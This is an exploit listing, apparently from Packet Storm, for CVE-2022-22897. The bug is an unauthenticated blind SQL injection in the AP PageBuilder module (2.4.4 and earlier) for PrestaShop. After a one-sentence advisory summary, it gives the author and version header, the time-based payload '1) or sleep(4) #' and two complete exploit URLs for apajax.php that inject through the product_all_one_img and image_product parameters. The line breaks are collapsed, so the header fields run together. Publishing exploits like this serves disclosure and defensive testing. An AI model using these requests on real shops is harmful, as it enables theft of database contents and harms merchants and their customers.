Headline
CVE-2022-22897: PrestaShop Ap Pagebuilder 2.4.4 SQL Injection ≈ Packet Storm
A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.
# Exploit Title: AP PAGEBUILDER Prestashop module <= 2.4.4 'product_all_one_img' , 'image_product' Blind SQL Injection# Date: 24-08-2022# Exploit Author: Mohamed Ali Hammami# Vendor Homepage: https://apollotheme.com/#Software Link : https://apollotheme.com/products/ap-pagebuilder-prestashop-module# Version: 2.4.4# Tested on: Windows 10#CVE: CVE-2022-22897Parameters: product_all_one_img,image_productPayload: 1) or sleep(4) #Exploit:http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1)+or+sleep(4)%23&image_product=0&wishlist_compare=1http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1&image_product=1)+or+sleep(4)%23&wishlist_compare=1